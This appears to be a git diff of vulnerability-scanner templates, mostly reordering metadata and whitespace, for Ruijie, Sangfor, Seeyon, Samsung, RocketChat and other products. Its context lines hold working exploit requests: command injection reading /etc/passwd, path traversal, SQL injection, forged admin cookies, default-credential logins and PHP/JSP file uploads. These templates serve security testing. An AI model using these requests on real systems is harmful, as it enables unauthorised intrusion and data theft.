shodan-query: html:"server_databases.php" fofa-query: body="server_databases.php" tags: misconfig,phpmyadmin,unauth @@ -28,9 +28,10 @@ http: - "/phpMyAdmin/index.php" - "/phpmyadmin/index.php" - "/_phpmyadmin/index.php" - attack: batteringram + attack: batteringram stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/portainer-init-deploy.yaml b/http/vulnerabilities/portainer-init-deploy.yaml index 1db4444292..30805e24d5 100644 --- a/http/vulnerabilities/portainer-init-deploy.yaml +++ b/http/vulnerabilities/portainer-init-deploy.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Portainer" tags: portainer,exposure,docker,devops,disclosure diff --git a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml index fe8e76dc96..c6a48d3675 100644 --- a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml +++ b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/#pll_switcher metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"Prestashop" tags: prestashop,sqli @@ -30,4 +30,4 @@ http: dsl: - 'duration_2>=6' - 'contains(body, "module-apmarketplace-passwordrecovery")' - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml index f05d769826..cc6fbb13e6 100755 --- a/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml +++ b/http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml @@ -10,15 +10,16 @@ info: - https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecSSL%203600%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E7%B3%BB%E7%BB%9F%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 1 fofa-query: app="安全接入网关SecSSLVPN" - verified: true tags: secsslvpn,auth-bypass http: - method: GET path: - "{{BaseURL}}/admin/group/x_group.php?id=1" + headers: Cookie: admin_id=1; gw_admin_ticket=1; @@ -38,4 +39,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/qibocms-file-download.yaml b/http/vulnerabilities/qibocms-file-download.yaml index 8f6a7edbbd..ee2e54c872 100644 --- a/http/vulnerabilities/qibocms-file-download.yaml +++ b/http/vulnerabilities/qibocms-file-download.yaml @@ -5,8 +5,8 @@ info: author: theabhinavgaur severity: high metadata: - max-request: 1 verified: true + max-request: 1 tags: qibocms,lfr http: diff --git a/http/vulnerabilities/rails/rails6-xss.yaml b/http/vulnerabilities/rails/rails6-xss.yaml index 7554f52772..286e40ef6a 100644 --- a/http/vulnerabilities/rails/rails6-xss.yaml +++ b/http/vulnerabilities/rails/rails6-xss.yaml @@ -5,7 +5,6 @@ id: rails6-xss # extended payload to make Nuclei work. # Working poc by @Mad-robot # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 - info: name: Ruby on Rails - CRLF Injection and Cross-Site Scripting author: ooooooo_q,rootxharsh,iamnoooob @@ -13,9 +12,9 @@ info: description: Ruby on Rails 6.0.0-6.0.3.1 contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting. reference: - https://hackerone.com/reports/904059 - tags: rails,xss,crlf,hackerone metadata: max-request: 1 + tags: rails,xss,crlf,hackerone http: - method: POST @@ -28,9 +27,11 @@ http: words: - 'javascript:alert(1)' part: body + - type: status status: - 302 + - type: word words: - 'Location: aaaaa' diff --git a/http/vulnerabilities/ransomware/deadbolt-ransomware.yaml b/http/vulnerabilities/ransomware/deadbolt-ransomware.yaml index 6b21f801e1..5155c25dde 100644 --- a/http/vulnerabilities/ransomware/deadbolt-ransomware.yaml +++ b/http/vulnerabilities/ransomware/deadbolt-ransomware.yaml @@ -4,9 +4,9 @@ info: name: Deadbolt Ransomware Detection author: pdteam severity: info - tags: ransomware,deadbolt metadata: max-request: 1 + tags: ransomware,deadbolt http: - method: GET diff --git a/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml b/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml index 912ae972da..eedfdf1037 100644 --- a/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml +++ b/http/vulnerabilities/realor/realor-gwt-system-sqli.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/realor-gwt-system-sql-injection.yaml metadata: - fofa-query: app="REALOR-天翼应用虚拟化系统" - max-request: 2 verified: "true" + max-request: 2 + fofa-query: app="REALOR-天翼应用虚拟化系统" tags: realor,sqli http: @@ -19,7 +19,6 @@ http: - | GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1 Host: {{Hostname}} - - | GET /Board.XGI HTTP/1.1 Cookie: PHPSESSID={{cookie}} @@ -33,7 +32,6 @@ http: group: 1 regex: - 'PHPSESSID=(.*?);' - matchers: - type: dsl dsl: diff --git a/http/vulnerabilities/rocketchat/unauth-message-read.yaml b/http/vulnerabilities/rocketchat/unauth-message-read.yaml index 95445e858d..2737199e44 100644 --- a/http/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/http/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -5,6 +5,7 @@ info: author: rojanrijal severity: high description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens. + remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8. reference: - https://docs.rocket.chat/guides/security/security-updates - https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages @@ -12,14 +13,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-522 - remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8. - tags: rocketchat,unauth metadata: max-request: 2 - + tags: rocketchat,unauth variables: value: "{{to_lower(rand_text_alpha(5))}}" user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" + http: - raw: - | @@ -30,7 +30,6 @@ http: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"{{value}}\",\"name\":\"cve-2020-{{value}}\",\"email\":\"{{user_email}}\"}],\"id\":\"123\"}"} - - | POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} @@ -41,7 +40,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/vulnerabilities/royalevent/royalevent-management-xss.yaml b/http/vulnerabilities/royalevent/royalevent-management-xss.yaml index d89e0109ce..d955a16435 100644 --- a/http/vulnerabilities/royalevent/royalevent-management-xss.yaml +++ b/http/vulnerabilities/royalevent/royalevent-management-xss.yaml @@ -14,9 +14,9 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 2 verified: true - tags: cms,royalevent,packetstorm,xss,authenticated + max-request: 2 + tags: cms,royalevent,packetstorm,xss,authenticated,intrusive http: - raw: @@ -38,7 +38,6 @@ http: Content-Disposition: form-data; name="login" ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} @@ -59,6 +58,7 @@ http: ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml b/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml index 62fd4ba197..14597967aa 100644 --- a/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml +++ b/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml @@ -14,8 +14,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 tags: xss,unauthenticated,cms,royalevent,packetstorm http: diff --git a/http/vulnerabilities/ruijie-eg-login-rce.yaml b/http/vulnerabilities/ruijie-eg-login-rce.yaml index 2788a0be5d..bd64d070a5 100644 --- a/http/vulnerabilities/ruijie-eg-login-rce.yaml +++ b/http/vulnerabilities/ruijie-eg-login-rce.yaml @@ -5,16 +5,16 @@ info: author: pikpikcu,pdteam severity: critical description: Ruijie EG Easy Gateway login.php has remote commmand execution vulnerability, which can lead to the disclosure of administrator account and password. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 reference: - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - https://www.ruijienetworks.com - tags: ruijie,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 metadata: max-request: 1 + tags: ruijie,rce http: - raw: diff --git a/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml b/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml index 647bf6f176..7dfe7df1a0 100644 --- a/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml @@ -10,11 +10,11 @@ info: - https://www.ruijienetworks.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: ruijie,rce metadata: max-request: 3 + tags: ruijie,rce http: - raw: @@ -24,14 +24,12 @@ http: Content-Type: application/x-www-form-urlencoded username=admin&password=admin?show+webmaster+user - - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin&password={{admin}} - - | POST /cli.php?a=shell HTTP/1.1 Host: {{Hostname}} @@ -40,6 +38,7 @@ http: notdelay=true&command=cat /etc/passwd cookie-reuse: true + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/ruijie/ruijie-excu-shell.yaml b/http/vulnerabilities/ruijie/ruijie-excu-shell.yaml index 649b0f1105..d617c2d556 100644 --- a/http/vulnerabilities/ruijie/ruijie-excu-shell.yaml +++ b/http/vulnerabilities/ruijie/ruijie-excu-shell.yaml @@ -10,8 +10,8 @@ info: - https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL - https://github.com/ibaiw/2023Hvv/blob/main/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BA%20WEB%20%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20EXCU_SHELL%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" tags: ruijie,switch,disclosure,misconfig @@ -35,4 +35,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml index d32b173967..07cecaa2dd 100644 --- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml @@ -1,4 +1,5 @@ id: ruijie-nbr-fileupload + info: name: Ruijie NBR fileupload.php - Arbitrary File Upload author: SleepingBag945 @@ -8,11 +9,10 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml metadata: - fofa-query: app="Ruijie-NBR路由器" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="Ruijie-NBR路由器" tags: ruijie,file-upload,intrusive,nbr - variables: filename: "{{rand_base(6)}}" string: "{{rand_base(5)}}" @@ -27,7 +27,6 @@ http: Content-Type: image/jpeg - - | GET /ddi/server/upload/{{filename}}.php HTTP/1.1 Host: {{Hostname}} @@ -37,4 +36,4 @@ http: dsl: - status_code_1 == 200 && contains(body_1,"jsonrpc") - status_code_2 == 200 && contains(body_2,"{{string}}") - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml b/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml index 28c6174f38..63867c753d 100644 --- a/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml +++ b/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml @@ -11,22 +11,23 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: ruijie,lfi,edb metadata: max-request: 1 + tags: ruijie,lfi,edb http: - method: GET path: - "{{BaseURL}}/download.do?file=../../../../config.text" + matchers-condition: and matchers: - - type: word words: - 'filename="config.text"' - "Content-Type: application/octet-stream" part: header + - type: word words: - "version S29_RGOS 11.4" diff --git a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml index 7b9d93d81f..c885e8aab3 100644 --- a/http/vulnerabilities/ruijie/ruijie-password-leak.yaml +++ b/http/vulnerabilities/ruijie/ruijie-password-leak.yaml @@ -11,8 +11,8 @@ info: - https://www.ruijie.com.cn/gy/xw-aqtg-zw/86924/ - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14536 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Get_Verify_Info" tags: password,leak,ruijie,exposure,firewall,router diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml index 66640dab6e..0fba47a7f2 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: xss,samsung,lfi metadata: max-request: 1 + tags: xss,samsung,lfi http: - method: GET @@ -27,6 +27,7 @@ http: - "root:.*:0:0:" - "bin:.*:1:1" part: body + - type: status status: - 200 diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml index f5b791fc7d..3ef9c95dd0 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml @@ -9,16 +9,17 @@ info: - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: xss,samsung,rce metadata: max-request: 1 + tags: xss,samsung,rce http: - method: POST path: - "{{BaseURL}}/(download)/tmp/poc.txt" + body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt" matchers-condition: and diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml index 3563ec9ff7..8fbb500b98 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,samsung metadata: max-request: 1 + tags: xss,samsung http: - method: GET diff --git a/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml b/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml index 10b461e236..8773a8f3f3 100644 --- a/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml @@ -10,13 +10,13 @@ info: - https://mobile.twitter.com/sec715/status/1406886851072253953 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="sangfor" - tags: rce,sangfor + tags: rce,sangfor,intrusive http: - method: GET diff --git a/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml b/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml index a81243c8a0..8240543ccb 100644 --- a/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml @@ -9,7 +9,7 @@ info: - https://www.cnblogs.com/0day-li/p/13650452.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 1 @@ -20,8 +20,10 @@ http: - method: POST path: - "{{BaseURL}}/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9" + headers: Content-Type: application/x-www-form-urlencoded + body: | {"params":"w=123\"'1234123'\"|cat /etc/passwd"} diff --git a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml index b182eaf6e1..b15106434b 100644 --- a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: fid="iaytNA57019/kADk8Nev7g==" tags: sangfor,rce @@ -29,4 +29,4 @@ http: - status_code == 200 - regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)", body) - contains(body, "cluster_mode_others") - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml index c836cc43eb..950040cd7b 100644 --- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml +++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml @@ -10,11 +10,10 @@ info: - https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg==" - max-request: 2 verified: "true" + max-request: 2 + fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg==" tags: secgate,3600,firewall,file-upload,intrusive - variables: filename: "{{rand_base(6)}}" string: "{{randstr}}" @@ -49,7 +48,6 @@ http: 0b9d6b1ab7479ab69d9f71b05e0e9445 ------WebKitFormBoundary{{string}}-- - - | GET /attachements/{{filename}}.php HTTP/1.1 Host: {{Hostname}} @@ -61,4 +59,4 @@ http: - status_code_2 == 200 - contains(body_2,'{{file-upload}}') - contains(header_2,'text/html') - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/seeyon/seeyon-config-exposure.yaml b/http/vulnerabilities/seeyon/seeyon-config-exposure.yaml index fef9bd717d..f4bb685311 100755 --- a/http/vulnerabilities/seeyon/seeyon-config-exposure.yaml +++ b/http/vulnerabilities/seeyon/seeyon-config-exposure.yaml @@ -10,9 +10,9 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20config.jsp%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java metadata: + verified: true max-request: 1 fofa-query: body="yyoa" && app="致远互联-OA" - verified: true tags: seeyon,oa,config,info-leak http: diff --git a/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml b/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml index bac902e8ca..1f0ecdbe81 100755 --- a/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml +++ b/http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml @@ -10,9 +10,9 @@ info: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md metadata: - fofa-query: title="致远A8+协同管理软件.A6" - max-request: 2 verified: true + max-request: 2 + fofa-query: title="致远A8+协同管理软件.A6" tags: seeyon,oa,info-leak http: @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/yyoa/ext/createMysql.jsp" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -36,4 +37,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml b/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml index 0645212bbe..7ae89f57d8 100755 --- a/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml +++ b/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml @@ -10,9 +10,9 @@ info: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20initDataAssess.jsp%20%E7%94%A8%E6%88%B7%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md metadata: + verified: true max-request: 1 fofa-query: body="yyoa" && app="致远互联-OA" - verified: true tags: seeyon,oa,info-leak http: diff --git a/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml index b5e620f8a2..abc405999e 100755 --- a/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml +++ b/http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml @@ -8,9 +8,9 @@ info: - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java - https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go metadata: + verified: true max-request: 1 fofa-query: app="致远互联-OA" - verified: true tags: seeyon,oa,rce,fastjson,oast http: @@ -32,4 +32,4 @@ http: - type: word part: body words: - - "com.alibaba.fastjson.JSONException" \ No newline at end of file + - "com.alibaba.fastjson.JSONException" diff --git a/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml b/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml index 349bb5d875..6b8f98834e 100755 --- a/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml +++ b/http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml @@ -11,11 +11,10 @@ info: - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20setextno.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 1 fofa-query: body="yyoa" && app="致远互联-OA" - verified: true tags: seeyon,oa,sqli - variables: num: "999999999" @@ -35,4 +34,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml index 0acbc5b32a..d3c683733b 100755 --- a/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml +++ b/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml @@ -11,11 +11,10 @@ info: - http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: app="致远互联-OA" && title="V8.0SP2" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="致远互联-OA" && title="V8.0SP2" tags: seeyon,oa,file-upload,intrusive - variables: filename: "{{rand_base(6)}}" string: "{{rand_base(5)}}" @@ -34,7 +33,6 @@ http: <% out.println("{{string}}");%> --59229605f98b8cf290a7b8908b34616b-- - - | GET /{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} @@ -53,4 +51,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml b/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml index 98b3d861c2..4576b61770 100644 --- a/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml +++ b/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml @@ -11,23 +11,26 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: seeyon,wooyun,lfi,zhiyuan metadata: max-request: 1 + tags: seeyon,wooyun,lfi,zhiyuan http: - method: GET path: - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "NCInvokerServlet" part: body + - type: word part: header words: diff --git a/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml b/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml index 8b7e1b3410..eb51e2b696 100644 --- a/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml +++ b/http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml @@ -5,12 +5,12 @@ info: author: gy741 severity: critical description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server and cause execute arbitrary code to be executed. + remediation: Apply the appropriate patch. reference: - https://www.programmersought.com/article/92658169875/ - remediation: Apply the appropriate patch. - tags: zhiyuan,rce,fileupload,seeyon,intrusive metadata: max-request: 1 + tags: zhiyuan,rce,fileupload,seeyon,intrusive http: - method: GET diff --git a/http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml b/http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml index 1b4649a036..e6dc81e354 100644 --- a/http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml +++ b/http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md - tags: zhiyuan,leak,disclosure,seeyon metadata: max-request: 1 + tags: zhiyuan,leak,disclosure,seeyon http: - method: GET diff --git a/http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml 